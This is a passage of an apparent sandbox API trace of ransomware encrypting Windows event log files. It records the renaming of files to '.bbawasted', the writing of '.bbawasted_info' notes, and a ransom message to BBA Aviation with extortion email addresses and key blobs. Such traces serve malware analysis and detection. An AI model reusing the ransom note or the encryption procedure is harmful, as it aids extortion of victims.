(hProv=0x6a61b8, dwFlags=0x0) returned 1 [0187.578] lstrlenW (lpString="\\\\?\\C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx") returned 60 [0187.578] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x282) returned 0x6aecf0 [0187.578] lstrcpyW (in: lpString1=0x6aed68, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0187.578] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0187.578] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6460) returned 1 [0187.579] CryptGenRandom (in: hProv=0x6a6460, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0187.579] CryptReleaseContext (hProv=0x6a6460, dwFlags=0x0) returned 1 [0187.579] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx.bbawasted_info" (normalized: "c:\\logs\\microsoft-windows-devicesetupmanager%4admin.evtx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0187.581] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0187.583] SetEndOfFile (hFile=0x28c) returned 1 [0187.583] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0187.583] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0187.583] lstrcpyW (in: lpString1=0x6aed68, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0187.583] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-devicesetupmanager%4admin.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-devicesetupmanager%4admin.evtx.bbawasted")) returned 1 [0187.591] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Admin.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-devicesetupmanager%4admin.evtx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0187.592] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0187.592] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x11000 [0187.592] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11000) returned 0x640000 [0187.592] CloseHandle (hObject=0x280) returned 1 [0187.611] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0187.611] CloseHandle (hObject=0x294) returned 1 [0187.611] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0187.612] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a63d8) returned 1 [0187.612] CryptGenRandom (in: hProv=0x6a63d8, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0187.612] CryptReleaseContext (hProv=0x6a63d8, dwFlags=0x0) returned 1 [0187.612] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a65f8) returned 1 [0187.613] CryptGenRandom (in: hProv=0x6a65f8, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0187.613] CryptReleaseContext (hProv=0x6a65f8, dwFlags=0x0) returned 1 [0187.758] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0187.759] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0187.759] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0187.759] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]H9p50lucXPTvc+Lc63rCDtKCVaGebrZOdc0FFcOn7OBRNLbPQ6JiT6SDSxgzn6W8\r\n6fJEas9TFfv7nR3nPmXAkQzIH8mILtpMDq0XNEsK4+Loz/OgPAJi8BMUHF5R4sNz\r\nh1sKwv+uiHsfLb7iDDaIHLBy3Oo/Qb+GFc19J8/2ohtbOvtUS1ZJhjP1sjbo+ddZ\r\nTlx3kNqDpmqtAFAKjB12VIIQxjEHTF2+1ZRRxoU1+ZH3bc0FSLXiszf30EETcIz2\r\ni1nDMWyz2k10K2dYNPjoA4jbLIe/Cunjo9CBo8iG2Mo9Q1yPKuq3nhnpg1g/3Slh\r\n5zg9ABTkBEYOZdkm7XFSu4q1LI10gNnAXzqHfLfeeWF4zZYGdfaHZuulTE3JuAuP\r\nRaNruaMF4WCryEq7dtpb4vzuV80kQyyBJpelcrWkClNea8Uul5kew2wwY2kTSc70\r\ni5IjRjL/ZET+sOsyIuSGGXKLM79nz30vFiwRIsw6zzkTGJwZDP+9SnZxI53rPK8o\r\nz++uXaheudv4r2f2NrkiOJFZeCqPoQ2NzKuMUE4JJZoK1PSIMBDoziyPzP7vdU0u\r\nimIRoZO5kCxjwYf57srIqCTcGwqdeMCfQOL/Hwo+LCMT9n3tCFeCBjxpEnJopWIG\r\nYSHXzmmvvxfHd5334t/dXKvoYCkHYGaL+Pw+etUVFHU=[end_key]\r\nKEEP IT\r\n") returned 984 [0187.759] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0187.759] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0187.759] SetEndOfFile (hFile=0x28c) returned 1 [0187.762] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0187.762] CloseHandle (hObject=0x28c) returned 1 [0187.768] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0187.769] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a8698 | out: hHeap=0x660000) returned 1 [0187.769] _aulldvrm () returned 0x0 [0187.769] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6570) returned 1 [0187.770] CryptGenRandom (in: hProv=0x6a6570, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0187.770] CryptReleaseContext (hProv=0x6a6570, dwFlags=0x0) returned 1 [0187.770] lstrlenW (lpString="\\\\?\\C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx") returned 66 [0187.770] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x28e) returned 0x6aecf0 [0187.771] lstrcpyW (in: lpString1=0x6aed74, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0187.771] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0187.771] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a61b8) returned 1 [0187.772] CryptGenRandom (in: hProv=0x6a61b8, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0187.772] CryptReleaseContext (hProv=0x6a61b8, dwFlags=0x0) returned 1 [0187.772] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx.bbawasted_info" (normalized: "c:\\logs\\microsoft-windows-devicesetupmanager%4operational.evtx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0187.774] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0187.775] SetEndOfFile (hFile=0x28c) returned 1 [0187.776] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0187.776] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0187.776] lstrcpyW (in: lpString1=0x6aed74, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0187.776] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-devicesetupmanager%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-devicesetupmanager%4operational.evtx.bbawasted")) returned 1 [0187.777] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-DeviceSetupManager%4Operational.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-devicesetupmanager%4operational.evtx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0187.778] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0187.778] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x11000 [0187.778] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11000) returned 0x640000 [0187.778] CloseHandle (hObject=0x294) returned 1 [0187.842] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0187.843] CloseHandle (hObject=0x280) returned 1 [0187.843] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0187.843] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a5f10) returned 1 [0187.844] CryptGenRandom (in: hProv=0x6a5f10, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0187.844] CryptReleaseContext (hProv=0x6a5f10, dwFlags=0x0) returned 1 [0187.844] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6818) returned 1 [0187.845] CryptGenRandom (in: hProv=0x6a6818, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0187.845] CryptReleaseContext (hProv=0x6a6818, dwFlags=0x0) returned 1 [0188.067] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0188.067] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0188.067] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0188.067] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]SbOhWhCpW3/q4nSAjNaAxkG+mYXrhnzfY5PnlsmLybs5W1j6xLtLM9nd8yNQTEWF\r\nafBsYDBh+qyGpJ4130QDMBSN49Q20cYveFWU6x92bFraHj+Mt5S7LQOSd+n/Aj6s\r\nCI1qgcElRng5blM+b7r7watyN/Jfi/ZEvmSFRm6L6QFBjz0yEcupPWpRQfxs4RNX\r\nLMIoS+UekFhepR/YeW0QemBPPYCAvDerwiv4EXit8c1iweaWLxEnDSk6kgjigan6\r\nvtVNMINnnOF8VbATJq7ZhqtjHbu0pOmLK3lXVCZHkf9Af2Ahf9hzeMH2Weav+/5N\r\nK4kbvj9JtJFc3OfzrZFr15DZV4m0/gCOKfuKeR1XAGSQ2rCRso0FHBCELGw9aF9/\r\nokdvb7IeSxHpMI0IlayRslqxo13jNGILYQo+5+kWBOM9fICK8HXRUM8sT/fOsrvi\r\nR+R43iOSX3UQq43EZzR6s8eETi3TC6nwNgSpmyMkG8eEV/IyOkN/JZEgZXBUhMGs\r\nwORrstx608N5oQahaLzp5Kr3NByCoxF2FB3ifBzwHjUqjd3D09eVJkDVhlBJVROU\r\nSX9grzJyBh0GtkqMFWWS8ftAY7ZnIWJXd401tfj+a6OQR+iJV4Mv+rZ9gH0AccGJ\r\np+oGchN6xWsmjOJg1xBcrGto/FDBageY0tdvBycTi/Q=[end_key]\r\nKEEP IT\r\n") returned 984 [0188.067] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0188.068] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0188.068] SetEndOfFile (hFile=0x28c) returned 1 [0188.071] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0188.071] CloseHandle (hObject=0x28c) returned 1 [0188.081] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0188.081] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a91a8 | out: hHeap=0x660000) returned 1 [0188.315] _aulldvrm () returned 0x0 [0188.316] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6bd0) returned 1 [0188.316] CryptGenRandom (in: hProv=0x6a6bd0, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0188.316] CryptReleaseContext (hProv=0x6a6bd0, dwFlags=0x0) returned 1 [0188.316] lstrlenW (lpString="\\\\?\\C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx") returned 53 [0188.316] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x274) returned 0x6a8fa8 [0188.317] lstrcpyW (in: lpString1=0x6a9012, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0188.317] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0188.317] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a60a8) returned 1 [0188.317] CryptGenRandom (in: hProv=0x6a60a8, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0188.317] CryptReleaseContext (hProv=0x6a60a8, dwFlags=0x0) returned 1 [0188.317] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx.bbawasted_info" (normalized: "c:\\logs\\microsoft-windows-dhcp-client%4admin.evtx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0188.318] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0188.319] SetEndOfFile (hFile=0x28c) returned 1 [0188.320] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0188.320] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0188.320] lstrcpyW (in: lpString1=0x6a9012, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0188.320] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-dhcp-client%4admin.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-dhcp-client%4admin.evtx.bbawasted")) returned 1 [0188.321] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Dhcp-Client%4Admin.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-dhcp-client%4admin.evtx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0188.321] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0188.321] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x11000 [0188.322] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11000) returned 0x640000 [0188.322] CloseHandle (hObject=0x280) returned 1 [0188.329] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0188.329] CloseHandle (hObject=0x294) returned 1 [0188.330] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0188.330] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6240) returned 1 [0188.330] CryptGenRandom (in: hProv=0x6a6240, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0188.330] CryptReleaseContext (hProv=0x6a6240, dwFlags=0x0) returned 1 [0188.330] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6d68) returned 1 [0188.331] CryptGenRandom (in: hProv=0x6a6d68, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0188.331] CryptReleaseContext (hProv=0x6a6d68, dwFlags=0x0) returned 1 [0188.343] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0188.343] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0188.343] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0188.343] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]sLKjq1hX5bLJFE3ckUfMq7hdm+8iU0wbjnv0Thfh21d1kLkqdGna4TlkyBLvoqfj\r\nhqG079CQslLqoFx56fUH1+/0YErMYmH4vugUplRa3WWkIqDelyWuxRh0kS4S0OD3\r\nhymWzbrMGAYssDya0dJgtHfGgHL4FDh6gSkH43umQOH4kgbIb8qCGuuEVSVyyTk3\r\nKbFOVCH74eQxasxsfG3Hh6egXpTtMzg6VobTOMtI0HT92cPmvZ+tEqymPwEkIRi4\r\nUajOEUKJrj8zSzGJYAvlZFs4w/yRoLd/FVOwtEGj0Vci1Y/fl0JnAHOMduRKJGIJ\r\n/ME/OC7mpvk2YfUcYjG7/pOZ+8xRbbJSKNLNbO/cJGlYsN2eZwGwtaXvvduHX70y\r\ncTZmo8+fORoTw1vOSmd0NYri0V7xAxwHgqxoVcU3kt0j792bdBfJZrsDZ4vSiHTp\r\nYvjdmxJVmkDa70K6bIQJWFAW3CX+mYCVW+o8PG1MH1VmAYLpP+RkbiSkERUmM4FI\r\n7i9WfzLYxzdM7T4rUp3QLfppvuaQGrZRiD3lczqBanY5RfIKm/uEWItBr/n1FeX3\r\n9+vWb+x81hIj2i2x8xfAF6ggEPlooYtM0wRSuBr3fBOpETv4OqulFdQxKTqQEL68\r\nljmwA9UxqGPa51xdwrKLD4z9aSo1vF1UIHPN/GBIcB9=[end_key]\r\nKEEP IT\r\n") returned 984 [0188.343] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0188.343] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0188.344] SetEndOfFile (hFile=0x28c) returned 1 [0188.346] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0188.347] CloseHandle (hObject=0x28c) returned 1 [0188.352] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a8fa8 | out: hHeap=0x660000) returned 1 [0188.353] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a9288 | out: hHeap=0x660000) returned 1 [0188.353] _aulldvrm () returned 0x0 [0188.353] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6b48) returned 1 [0188.354] CryptGenRandom (in: hProv=0x6a6b48, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0188.354] CryptReleaseContext (hProv=0x6a6b48, dwFlags=0x0) returned 1 [0188.354] lstrlenW (lpString="\\\\?\\C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx") returned 55 [0188.354] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x278) returned 0x6aecf0 [0188.354] lstrcpyW (in: lpString1=0x6aed5e, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0188.354] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0188.354] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a5f10) returned 1 [0188.512] CryptGenRandom (in: hProv=0x6a5f10, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0188.512] CryptReleaseContext (hProv=0x6a5f10, dwFlags=0x0) returned 1 [0188.513] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx.bbawasted_info" (normalized: "c:\\logs\\microsoft-windows-dhcpv6-client%4admin.evtx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0188.513] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0188.515] SetEndOfFile (hFile=0x28c) returned 1 [0188.515] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0188.515] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0188.515] lstrcpyW (in: lpString1=0x6aed5e, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0188.515] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-dhcpv6-client%4admin.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-dhcpv6-client%4admin.evtx.bbawasted")) returned 1 [0188.516] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Dhcpv6-Client%4Admin.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-dhcpv6-client%4admin.evtx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0188.516] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, 